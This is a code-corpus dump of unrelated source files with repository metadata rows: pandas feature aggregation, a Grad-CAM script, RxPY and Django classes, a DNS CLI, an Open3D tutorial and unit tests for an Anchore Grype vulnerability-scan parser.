                # see: https://github.com/pandas-dev/pandas/issues/22501
                if pdtypes.is_categorical_dtype(frame.index):
                    categories = pdtypes.CategoricalDtype(categories=frame.index.categories)
                    to_merge.index = to_merge.index.astype(object).astype(categories)
                frame = pd.merge(left=frame, right=to_merge,
                                 left_index=True, right_index=True, how='left')
        # Handle default values
        # parents with no matching child rows got NaN from the left merge;
        # replace with each feature's declared default
        fillna_dict = {}
        for f in features:
            feature_defaults = {name: f.default_value
                                for name in f.get_feature_names()}
            fillna_dict.update(feature_defaults)
        frame.fillna(fillna_dict, inplace=True)
        # convert boolean dtypes to floats as appropriate
        # pandas behavior: https://github.com/pydata/pandas/issues/3752
        for f in features:
            if (f.number_output_features == 1 and
                    f.variable_type == variable_types.Numeric and
                    frame[f.get_name()].dtype.name in ['object', 'bool']):
                frame[f.get_name()] = frame[f.get_name()].astype(float)
        return frame
def _can_agg(feature):
    """Return True if `feature` can go through the fast pandas groupby-agg
    path: a single (non-where) base column, a single output column, and a
    primitive that does not depend on the calculation time.
    """
    assert isinstance(feature, AggregationFeature)
    primitive = feature.primitive
    if primitive.uses_calc_time:
        # time-dependent primitives must use the groupby-apply path
        return False
    names = [bf.get_name() for bf in feature.base_features]
    where = feature.where
    if where is not None:
        # the `where` column is a filter, not an aggregation input
        where_name = where.get_name()
        names = [name for name in names if name != where_name]
    return len(names) == 1 and primitive.number_output_features == 1
def agg_wrapper(feats, time_last):
    """Build a callable for ``groupby(...).apply`` that evaluates every
    feature in `feats` on a group's sub-frame and returns one row
    (a pandas Series) of feature-name -> value.

    `time_last` is forwarded as the ``time`` keyword to primitives whose
    function depends on the calculation time.
    """
    def wrap(df):
        row = {}
        for feat in feats:
            func = feat.get_function()
            # one input column per base feature, in declaration order
            columns = [df[bf.get_name()] for bf in feat.base_features]
            if feat.primitive.uses_calc_time:
                out = func(*columns, time=time_last)
            else:
                out = func(*columns)
            if feat.number_output_features == 1:
                # normalize single-output primitives to a one-element list
                out = [out]
            update_feature_columns(feat, row, out)
        return pd.Series(row)

    return wrap
def set_default_column(frame, f):
    """Fill every output column of feature `f` in `frame` with the
    feature's default value.
    """
    default = f.default_value
    for column in f.get_feature_names():
        frame[column] = default
def update_feature_columns(feature, data, values):
    """Store each computed value in `data` under its matching feature
    column name; `values` must have one entry per output column.
    """
    columns = feature.get_feature_names()
    assert len(columns) == len(values)
    for column, value in zip(columns, values):
        data[column] = value
| 44.715315 | 122 | 0.576218 |
f10a60a12a95651771558eba8bd95b1e3e915974 | 8,497 | py | Python | scripts/legacy/gradcam.py | rhong3/pancan_imaging | 969006a13e2fc2cbc05b695d48c8c45c30089704 | [
"MIT"
] | null | null | null | scripts/legacy/gradcam.py | rhong3/pancan_imaging | 969006a13e2fc2cbc05b695d48c8c45c30089704 | [
"MIT"
] | null | null | null | scripts/legacy/gradcam.py | rhong3/pancan_imaging | 969006a13e2fc2cbc05b695d48c8c45c30089704 | [
"MIT"
] | null | null | null | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models
import torch.nn.functional as F
import matplotlib.pyplot as plt
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input):
positive_mask = (input > 0).type_as(input)
output = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)
self.save_for_backward(input, output)
return output
@staticmethod
def backward(self, grad_output):
input, output = self.saved_tensors
grad_input = None
positive_mask_1 = (input > 0).type_as(grad_output)
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = torch.addcmul(torch.zeros(input.size()).type_as(input),
torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output,
positive_mask_1), positive_mask_2)
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model, use_cuda):
self.model = model
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
def recursive_relu_apply(module_top):
for idx, module in module_top._modules.items():
recursive_relu_apply(module)
if module.__class__.__name__ == 'ReLU':
module_top._modules[idx] = GuidedBackpropReLU.apply
# replace ReLU with GuidedBackpropReLU
recursive_relu_apply(self.model)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
output = self.forward(input.cuda())
else:
output = self.forward(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
# self.model.features.zero_grad()
# self.model.last_linear.zero_grad()
one_hot.backward(retain_graph=True)
output = input.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--use-cuda', action='store_true', default=False,
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
args = parser.parse_args()
args.use_cuda = args.use_cuda and torch.cuda.is_available()
if args.use_cuda:
print("Using GPU for acceleration")
else:
print("Using CPU for computation")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img*255)
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255 * (1-mask)), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
return (np.uint8(255 * cam))
class GradCam:
def __init__(self, model, feature_module, target_layer_names, use_cuda):
self.model = model
self.feature_module = feature_module
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
self.extractor = ModelOutputs(self.model, self.feature_module, target_layer_names)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
features, output = self.extractor(input.cuda())
else:
features, output = self.extractor(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
self.feature_module.zero_grad()
self.model.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.extractor.get_gradients()[-1].cpu().data.numpy()
target = features[-1]
target = target.cpu().data.numpy()[0, :]
weights = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.zeros(target.shape[1:], dtype=np.float32)
for i, w in enumerate(weights):
cam += w * target[i, :, :]
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, input.shape[2:])
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
class FeatureExtractor():
""" Class for extracting activations and
registering gradients from targetted intermediate layers """
def __init__(self, model, target_layers):
self.model = model
self.target_layers = target_layers
self.gradients = []
def save_gradient(self, grad):
self.gradients.append(grad)
def __call__(self, x):
outputs = []
self.gradients = []
for name, module in self.model._modules.items():
x = module(x)
if name in self.target_layers:
x.register_hook(self.save_gradient)
outputs += [x]
return outputs, x
class ModelOutputs():
""" Class for making a forward pass, and getting:
1. The network output.
2. Activations from intermeddiate targetted layers.
3. Gradients from intermeddiate targetted layers. """
def __init__(self, model, feature_module, target_layers):
self.model = model
self.feature_module = feature_module
self.feature_extractor = FeatureExtractor(self.feature_module, target_layers)
def get_gradients(self):
return self.feature_extractor.gradients
def __call__(self, x):
target_activations = []
for name, module in self.model._modules.items():
if module == self.feature_module:
target_activations, x = self.feature_extractor(x)
adaptiveAvgPoolWidth = x.shape[2]
x = F.avg_pool2d(x, kernel_size=adaptiveAvgPoolWidth)
x = x.view(x.size(0), -1)
elif "avgpool" in name.lower():
x = module(x)
x = x.view(x.size(0), -1)
else:
x = module(x)
return target_activations, x
# if __name__ == '__main__':
# """ python grad_cam.py <path_to_image>
# 1. Loads an image with opencv.
# 2. Preprocesses it for VGG19 and converts to a pytorch variable.
# 3. Makes a forward pass to find the category index with the highest score,
# and computes intermediate activations.
# Makes the visualization. """
# args = get_args()
# # Can work with any model, but it assumes that the model has a
# # feature method, and a classifier method,
# # as in the VGG models in torchvision.
# model = models.resnet50(pretrained=True)
# grad_cam = GradCam(model=model, feature_module=model.layer4, \
# target_layer_names=["2"], use_cuda=args.use_cuda)
# img = cv2.imread(args.image_path, 1)
# img = np.float32(cv2.resize(img, (224, 224))) / 255
# input = preprocess_image(img)
# # If None, returns the map for the highest scoring category.
# # Otherwise, targets the requested index.
# target_index = None
# mask = grad_cam(input, target_index)
# show_cam_on_image(img, mask)
# gb_model = GuidedBackpropReLUModel(model=model, use_cuda=args.use_cuda)
# print(model._modules.items())
# gb = gb_model(input, index=target_index)
# gb = gb.transpose((1, 2, 0))
# cam_mask = cv2.merge([mask, mask, mask])
# cam_gb = deprocess_image(cam_mask*gb)
# gb = deprocess_image(gb)
# cv2.imwrite('gb.jpg', gb)
# cv2.imwrite('cam_gb.jpg', cam_gb) | 33.321569 | 103 | 0.610098 |
85d20d8ca73e63ebdcfe0f384c485daf798c6864 | 672 | py | Python | rx/linq/groupedobservable.py | AlexMost/RxPY | 05cb14c72806dc41e243789c05f498dede11cebd | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | rx/linq/groupedobservable.py | AlexMost/RxPY | 05cb14c72806dc41e243789c05f498dede11cebd | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | rx/linq/groupedobservable.py | AlexMost/RxPY | 05cb14c72806dc41e243789c05f498dede11cebd | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-11-04T11:13:49.000Z | 2021-11-04T11:13:49.000Z | from rx import AnonymousObservable, Observable
from rx.disposables import CompositeDisposable
class GroupedObservable(Observable):
def __init__(self, key, underlying_observable, merged_disposable=None):
super(GroupedObservable, self).__init__(self._subscribe)
self.key = key
def subscribe(observer):
return CompositeDisposable(merged_disposable.disposable, underlying_observable.subscribe(observer))
self.underlying_observable = underlying_observable if not merged_disposable else AnonymousObservable(subscribe)
def _subscribe(self, observer):
return self.underlying_observable.subscribe(observer)
| 37.333333 | 119 | 0.767857 |
9afd733ea63952e83599722592308f117a834d6b | 1,793 | py | Python | StudArt/authentication/views.py | YuriyLisovskiy/OOA_Team_X-A | f8a977f5f498e33c69df1ed503d1e44d5f5b99a5 | [
"MIT"
] | null | null | null | StudArt/authentication/views.py | YuriyLisovskiy/OOA_Team_X-A | f8a977f5f498e33c69df1ed503d1e44d5f5b99a5 | [
"MIT"
] | 10 | 2020-11-06T08:37:02.000Z | 2020-12-09T23:08:25.000Z | StudArt/authentication/views.py | YuriyLisovskiy/OOA_Team_X-A | f8a977f5f498e33c69df1ed503d1e44d5f5b99a5 | [
"MIT"
] | 1 | 2021-09-16T10:56:02.000Z | 2021-09-16T10:56:02.000Z | from django.db.models import Q
from rest_framework import generics, permissions
from rest_framework.response import Response
from authentication.serializers import RegisterUserSerializer
from core.models import UserModel
# /api/v1/auth/register
# methods:
# - post:
# - username: string
# - email: string
# - password: string
# returns (in case of success):
# {
# "id": <int>,
# "username": <string>,
# "email": <string>,
# "first_name": <string>,
# "last_name": <string>,
# "avatar": <string (avatar full link)>,
# "is_superuser": <bool>,
# "rating": <float>,
# "token": <string (JWT token)>
# }
class RegisterUserAPIView(generics.CreateAPIView):
permission_classes = (permissions.AllowAny,)
queryset = UserModel.objects.all()
serializer_class = RegisterUserSerializer
# /api/v1/auth/user/exists
# methods:
# - get (at least one field is required):
# - username: string (optional)
# - email: string (optional)
# returns in case of success (else 400):
# {
# "exists": <bool>,
# "message": <string>
# }
class UserExistsAPIView(generics.RetrieveAPIView):
permission_classes = (permissions.AllowAny,)
def get(self, request, *args, **kwargs):
q = None
username = request.GET.get('username', None)
if username:
q = Q(username=username)
email = request.GET.get('email', None)
if email:
email_q = Q(email=email)
if q:
q |= email_q
else:
q = email_q
if not q:
return Response(status=400)
exists = UserModel.objects.filter(q).exists()
data = {
'exists': exists
}
if exists:
data['message'] = 'User with this username and(or) email address already exists'
else:
data['message'] = 'User does not exist'
return Response(data)
| 24.561644 | 83 | 0.645845 |
f6dcc7e8ebb20940a9bf8adb90460dbb63d69373 | 4,168 | py | Python | skywire-xns.py | devzone777/skywire-xns | dea50f53a5936c9bd3a28f28b1da38f3f5c70220 | [
"BSD-3-Clause"
] | null | null | null | skywire-xns.py | devzone777/skywire-xns | dea50f53a5936c9bd3a28f28b1da38f3f5c70220 | [
"BSD-3-Clause"
] | null | null | null | skywire-xns.py | devzone777/skywire-xns | dea50f53a5936c9bd3a28f28b1da38f3f5c70220 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
#
#
# Program:
# Install skywire-xns on Linux running python 2.7/3.0 and python-zmq
#
#
################################################################################
import readline
import sys
from optparse import OptionParser
import threading
import os
import re
from config import *
from server import *
from database import *
from dns_module import *
class App(object):
def __init__(self):
self.parser = OptionParser(version="%prog 0.1")
def parse_commandline(self):
self.parser.add_option("-d",
"--daemon",
action="store_true",
dest="daemon_mode",
default=False,
help="Runs server in daemon mode" )
(options, args) = self.parser.parse_args()
if options.daemon_mode:
print("in daemon mode")
os.spawnl(os.P_NOWAIT, "touch", "touch", "./daemon")
return True
return False
def print_help(self):
commands = {
"help": "print help commands",
"daemon": "detaches the server and exits this process",
"connect": "connect to another node",
"nodes": "print all known nodes",
"domains": "print all known domains",
"register": "register a domain with all known nodes",
"quit": "exit this process"
}
self.parser.print_help()
print("\n\tCLI commands:")
for (command, explanaiton) in sorted( commands.items() ):
print( "%-10s %s" % (command, explanaiton) )
def start_daemon(self):
proc_id = os.spawnl(os.P_NOWAIT,
sys.executable + " " + sys.argv[0],
"-d")
print("process id: %s" % proc_id)
self.quit()
def start_server(self):
self.db = Database()
self.srv = Server(self.db)
self.dns = DNSModule(self.db)
self.dns.start()
self.srv.start()
def stop(self):
self.dns.stop()
self.srv.stop()
self.srv.join()
self.dns.join()
sys.exit()
def run(self):
daemon_mode = self.parse_commandline()
self.start_server()
if not daemon_mode:
print( """\033[32mWelcome to the Skywire XNS CLI client.
To run in daemon mode, use '-d' to start or type 'daemon'.
To see command list, type 'help'\033[0m""" )
while True:
try:
io = raw_input("==>> ")
if io == "help":
self.print_help()
elif io == "daemon":
self.start_daemon()
elif io == "connect":
server = raw_input("server:")
port = raw_input("port[%s]:" % default_port)
try:
port = int(port)
except:
port = default_port
self.srv.add_node(server, port)
elif io == "nodes":
self.db.print_nodes()
elif io == "domains":
self.db.print_domains()
elif io == "register":
domain = raw_input("domain:")
ip = raw_input("IP:")
ttl = int(raw_input("TTL:"))
key = "" # not yet implemented, read key from file
self.srv.register_domain(domain, ip, key, ttl)
elif io == "quit":
self.stop()
else:
print("Didn't recognize command. "
"Please retry or type 'help'")
except EOFError:
self.stop()
if __name__ == "__main__":
app = App()
app.run()
| 31.816794 | 80 | 0.440019 |
8f04ca53407b16d120f95f48ccd3d072d1a3fbab | 507 | py | Python | back/api_1_0/decorators.py | aninstein/sex_code_blog | 483fcb566f2873204e545db2e4688dba3bee9db9 | [
"BSD-2-Clause"
] | 116 | 2019-09-19T01:00:48.000Z | 2022-03-16T08:52:15.000Z | back/api_1_0/decorators.py | aninstein/sex_code_blog | 483fcb566f2873204e545db2e4688dba3bee9db9 | [
"BSD-2-Clause"
] | 13 | 2019-08-13T14:39:21.000Z | 2022-03-22T02:36:46.000Z | back/api_1_0/decorators.py | aninstein/sex_code_blog | 483fcb566f2873204e545db2e4688dba3bee9db9 | [
"BSD-2-Clause"
] | 30 | 2019-08-13T10:13:07.000Z | 2022-01-19T09:50:31.000Z | # -*- coding: utf-8 -*-
from functools import wraps
from flask import g
from .errors import forbidden
def permission_required(permission):
"""
用于权限检测(rbac?)
:param permission:
:return:
"""
def decorator(f):
@wraps(f)
def decorator_function(*args, **kwargs):
if not g.current_user.can(permission):
return forbidden('Insufficient permissions')
return f(*args, **kwargs)
return decorator_function
return decorator
| 22.043478 | 60 | 0.617357 |
3095b6f70cdbecb46b9230237cd661ca671e711d | 444 | py | Python | projects/kc_projects/height_conv.py | nduprincekc/python-mini-projects | 5501399694ca2361f251c6190a1e450011101477 | [
"MIT"
] | null | null | null | projects/kc_projects/height_conv.py | nduprincekc/python-mini-projects | 5501399694ca2361f251c6190a1e450011101477 | [
"MIT"
] | null | null | null | projects/kc_projects/height_conv.py | nduprincekc/python-mini-projects | 5501399694ca2361f251c6190a1e450011101477 | [
"MIT"
] | null | null | null | import tkinter
from tkinter import Tk,Label,DoubleVar,Entry
window = Tk()
window.configure(background= 'yellow')
#print(window)
#window.size = 34,1112
window.geometry('323x222') # setting the width and the height of the app
window.title('kc app') # title of the app
window.resizable(width=False, height=False)
ft_lbl = Label(window,text= 'okk', bg ='black', fg = 'white', width = 12)
ft_lbl.grid(column=111,row=10,padx=15)
window.mainloop()
| 27.75 | 73 | 0.736486 |
9a9851042acfe8fea516877c0ce6f350c1c931f1 | 2,802 | py | Python | Docs_Geometry_File_IO.py | zhy29563/Tutorial_Open3D | 58d11e5673783855bae267373919355d5085fc24 | [
"MIT"
] | 2 | 2021-11-09T01:59:36.000Z | 2021-12-20T07:04:02.000Z | Docs_Geometry_File_IO.py | zhy29563/Tutorial_Open3D | 58d11e5673783855bae267373919355d5085fc24 | [
"MIT"
] | null | null | null | Docs_Geometry_File_IO.py | zhy29563/Tutorial_Open3D | 58d11e5673783855bae267373919355d5085fc24 | [
"MIT"
] | 1 | 2021-11-09T01:59:38.000Z | 2021-11-09T01:59:38.000Z | import open3d as o3d
# http://www.open3d.org/docs/release/tutorial/geometry/file_io.html
########################################################################################################################
# 1. Point cloud
########################################################################################################################
'''
reads a point cloud from a file. It tries to decode the file based on the extension name
Format Description
xyz Each line contains [x, y, z], where x, y, z are the 3D coordinates
xyzn Each line contains [x, y, z, nx, ny, nz], where nx, ny, nz are the normals
xyzrgb Each line contains [x, y, z, r, g, b], where r, g, b are in floats of range [0, 1]
pts The first line is an integer representing the number of points. Each subsequent line contains [x, y, z, i,
r, g, b], where r, g, b are in uint8
ply See Polygon File Format, the ply file can contain both point cloud and mesh data
(http://paulbourke.net/dataformats/ply/)
pcd See Point Cloud Data(http://pointclouds.org/documentation/tutorials/pcd_file_format.html)
It’s also possible to specify the file type explicitly. In this case, the file extension will be ignored.
pcd = o3d.io.read_point_cloud("../../test_data/my_points.txt", format='xyz')
'''
print("Testing IO for point cloud ...")
pcd = o3d.io.read_point_cloud("test_data/fragment.pcd")
print(pcd)
o3d.io.write_point_cloud("copy_of_fragment.pcd", pcd)
########################################################################################################################
# 2. Mesh
########################################################################################################################
'''
By default, Open3D tries to infer the file type by the filename extension.
The following mesh file types are supported:
Format Description
ply See Polygon File Format, the ply file can contain both point cloud and mesh data
stl See StereoLithography
obj See Object Files
off See Object File Format
gltf/glb See GL Transmission Format
'''
print("Testing IO for meshes ...")
mesh = o3d.io.read_triangle_mesh("test_data/knot.ply")
print(mesh)
o3d.io.write_triangle_mesh("copy_of_knot.ply", mesh)
########################################################################################################################
# 3. Image
########################################################################################################################
'''Both jpg and png image files are supported.'''
print("Testing IO for images ...")
img = o3d.io.read_image("test_data/lena_color.jpg")
print(img)
o3d.io.write_image("copy_of_lena_color.jpg", img)
| 50.945455 | 120 | 0.507138 |
3d762ad8d0287629c748ebc3754c1f7d30b9cd50 | 804 | py | Python | django_comments_xtd/__init__.py | rockmaga/django-comments-xtd | 29a49f29fddc0ec16bdfc77e16b46d97e83d2363 | [
"BSD-2-Clause"
] | null | null | null | django_comments_xtd/__init__.py | rockmaga/django-comments-xtd | 29a49f29fddc0ec16bdfc77e16b46d97e83d2363 | [
"BSD-2-Clause"
] | null | null | null | django_comments_xtd/__init__.py | rockmaga/django-comments-xtd | 29a49f29fddc0ec16bdfc77e16b46d97e83d2363 | [
"BSD-2-Clause"
] | null | null | null | from django.utils.module_loading import import_string
import django_comments
from django_comments.feeds import LatestCommentFeed
from django_comments.signals import comment_was_posted
default_app_config = 'django_comments_xtd.apps.CommentsXtdConfig'
def get_model():
from django_comments_xtd.conf import settings
return import_string(settings.COMMENTS_XTD_MODEL)
def get_form():
from django_comments_xtd.conf import settings
return import_string(settings.COMMENTS_XTD_FORM_CLASS)
VERSION = (2, 2, 1, 'f', 0) # following PEP 440
def get_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version = '%s.%s' % (version, VERSION[2])
if VERSION[3] != 'f':
version = '%s%s%s' % (version, VERSION[3], VERSION[4])
return version
| 25.935484 | 65 | 0.722637 |
f1f301a916ed06865cd685cc71b1cc7a079a8cc8 | 15,112 | py | Python | unittests/tools/test_anchore_grype_parser.py | mtcolman/django-DefectDojo | 76175aca446e077884bdb5e1d8e2a671a0840775 | [
"BSD-3-Clause"
] | 2 | 2022-03-29T11:37:23.000Z | 2022-03-31T18:32:35.000Z | unittests/tools/test_anchore_grype_parser.py | mtcolman/django-DefectDojo | 76175aca446e077884bdb5e1d8e2a671a0840775 | [
"BSD-3-Clause"
] | 39 | 2022-01-13T23:52:59.000Z | 2022-03-28T21:22:27.000Z | unittests/tools/test_anchore_grype_parser.py | mtcolman/django-DefectDojo | 76175aca446e077884bdb5e1d8e2a671a0840775 | [
"BSD-3-Clause"
] | null | null | null | from ..dojo_test_case import DojoTestCase
from dojo.models import Finding, Test
from dojo.tools.anchore_grype.parser import AnchoreGrypeParser
class TestAnchoreGrypeParser(DojoTestCase):
def test_parser_has_no_findings(self):
testfile = open("unittests/scans/anchore_grype/no_vuln.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(0, len(findings))
def test_parser_has_many_findings(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(1509, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-2011-3389":
self.assertEqual("CVE-2011-3389", finding.cve)
self.assertEqual("Medium", finding.severity)
self.assertEqual("libgnutls-openssl27", finding.component_name)
self.assertEqual("3.6.7-4+deb10u5", finding.component_version)
found = True
break
self.assertTrue(found)
def test_grype_parser_with_one_criticle_vuln_has_one_findings(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns2.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(1567, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-2019-9192":
self.assertEqual("CVE-2019-9192", finding.cve)
self.assertEqual("libc6-dev", finding.component_name)
self.assertEqual("2.28-10", finding.component_version)
self.assertEqual("Info", finding.severity)
found = True
break
self.assertTrue(found)
def test_grype_parser_with_many_vulns3(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns3.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(327, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-2011-3389":
self.assertEqual("CVE-2011-3389", finding.cve)
self.assertEqual("Medium", finding.severity)
self.assertEqual("libgnutls30", finding.component_name)
self.assertEqual("3.6.7-4+deb10u5", finding.component_version)
found = True
break
self.assertTrue(found)
def test_grype_parser_with_new_matcher_list(self):
found = False
testfile = open("unittests/scans/anchore_grype/many_vulns4.json")
parser = AnchoreGrypeParser()
findings = parser.get_findings(testfile, Test())
testfile.close()
self.assertEqual(9, len(findings))
for finding in findings:
self.assertIn(finding.severity, Finding.SEVERITIES)
self.assertIsNotNone(finding.cve)
if finding.vuln_id_from_tool == "CVE-1999-1338":
self.assertEqual("CVE-1999-1338", finding.cve)
self.assertEqual("Medium", finding.severity)
self.assertTrue("javascript-matcher" in finding.description)
self.assertEqual("delegate", finding.component_name)
self.assertEqual("3.2.0", finding.component_version)
found = True
self.assertTrue(found)
    def test_check_all_fields(self):
        """Exhaustively verify every mapped field of all five findings in the
        check_all_fields.json fixture: title, description, CVE, CWE, CVSS,
        severity, mitigation, references, component data, tags and the
        occurrence count."""
        testfile = open("unittests/scans/anchore_grype/check_all_fields.json")
        parser = AnchoreGrypeParser()
        findings = parser.get_findings(testfile, Test())
        testfile.close()
        self.assertEqual(5, len(findings))
        # findings[0]: dpkg match with no CVSS vector; severity maps to Info.
        finding = findings[0]
        self.assertEqual('CVE-2004-0971 in libgssapi-krb5-2:1.17-3+deb10u3', finding.title)
        description = '''**Vulnerability Id:** CVE-2004-0971
**Vulnerability Namespace:** debian:10
**Related Vulnerability Description:** The krb5-send-pr script in the kerberos5 (krb5) package in Trustix Secure Linux 1.5 through 2.1, and possibly other operating systems, allows local users to overwrite files via a symlink attack on temporary files.
**Matcher:** dpkg-matcher
**Package URL:** pkg:deb/debian/libgssapi-krb5-2@1.17-3+deb10u3?arch=amd64'''
        self.assertEqual(description, finding.description)
        self.assertEqual('CVE-2004-0971', finding.cve)
        self.assertEqual(1352, finding.cwe)
        self.assertIsNone(finding.cvssv3)
        self.assertIsNone(finding.cvssv3_score)
        self.assertEqual('Info', finding.severity)
        self.assertIsNone(finding.mitigation)
        references = '''**Vulnerability Datasource:** https://security-tracker.debian.org/tracker/CVE-2004-0971
**Related Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2004-0971
**Related Vulnerability URLs:**
- http://www.securityfocus.com/bid/11289
- http://www.gentoo.org/security/en/glsa/glsa-200410-24.xml
- http://www.redhat.com/support/errata/RHSA-2005-012.html
- http://www.trustix.org/errata/2004/0050
- http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=136304
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17583
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10497
- https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E'''
        self.assertEqual(references, finding.references)
        self.assertEqual('libgssapi-krb5-2', finding.component_name)
        self.assertEqual('1.17-3+deb10u3', finding.component_version)
        self.assertEqual('CVE-2004-0971', finding.vuln_id_from_tool)
        self.assertEqual(['dpkg'], finding.tags)
        self.assertEqual(1, finding.nb_occurences)
        # findings[1]: pypi package matched by two matchers; fix versions are
        # rendered as an upgrade list in the mitigation.
        finding = findings[1]
        self.assertEqual('CVE-2021-32626 in redis:4.0.2', finding.title)
        description = '''**Vulnerability Id:** CVE-2021-32626
**Vulnerability Namespace:** nvd
**Vulnerability Description:** Redis is an open source, in-memory database that persists on disk. In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result with heap corruption and potentially remote code execution. This problem exists in all versions of Redis with Lua scripting support, starting from 2.6. The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. For users unable to update an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.
**Matchers:**
- python-matcher
- python2-matcher
**Package URL:** pkg:pypi/redis@4.0.2'''
        self.assertEqual(description, finding.description)
        self.assertEqual('CVE-2021-32626', finding.cve)
        self.assertEqual(1352, finding.cwe)
        self.assertEqual('CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H', finding.cvssv3)
        self.assertEqual('High', finding.severity)
        mitigation = '''Upgrade to version:
- fix_1
- fix_2'''
        self.assertEqual(mitigation, finding.mitigation)
        references = '''**Vulnerability Datasource:** https://nvd.nist.gov/vuln/detail/CVE-2021-32626
**Vulnerability URLs:**
- https://github.com/redis/redis/commit/666ed7facf4524bf6d19b11b20faa2cf93fdf591
- https://github.com/redis/redis/security/advisories/GHSA-p486-xggp-782c
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VL5KXFN3ATM7IIM7Q4O4PWTSRGZ5744Z/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HTYQ5ZF37HNGTZWVNJD3VXP7I6MEEF42/
- https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E
- https://security.netapp.com/advisory/ntap-20211104-0003/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WR5WKJWXD4D6S3DJCZ56V74ESLTDQRAB/
- https://www.debian.org/security/2021/dsa-5001'''
        self.assertEqual(references, finding.references)
        self.assertEqual('redis', finding.component_name)
        self.assertEqual('4.0.2', finding.component_version)
        self.assertEqual('CVE-2021-32626', finding.vuln_id_from_tool)
        self.assertEqual(['python', 'python2'], finding.tags)
        self.assertEqual(1, finding.nb_occurences)
        # findings[2] and findings[3]: the same CVE reported against two
        # different components (libc-bin and libc6) stays two findings.
        finding = findings[2]
        self.assertEqual('CVE-2021-33574 in libc-bin:2.28-10', finding.title)
        description = '''**Vulnerability Id:** CVE-2021-33574
**Vulnerability Namespace:** debian:10
**Related Vulnerability Description:** The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.
**Matcher:** dpkg-matcher
**Package URL:** pkg:deb/debian/libc-bin@2.28-10?arch=amd64'''
        self.assertEqual(description, finding.description)
        self.assertEqual('CVE-2021-33574', finding.cve)
        self.assertEqual(1352, finding.cwe)
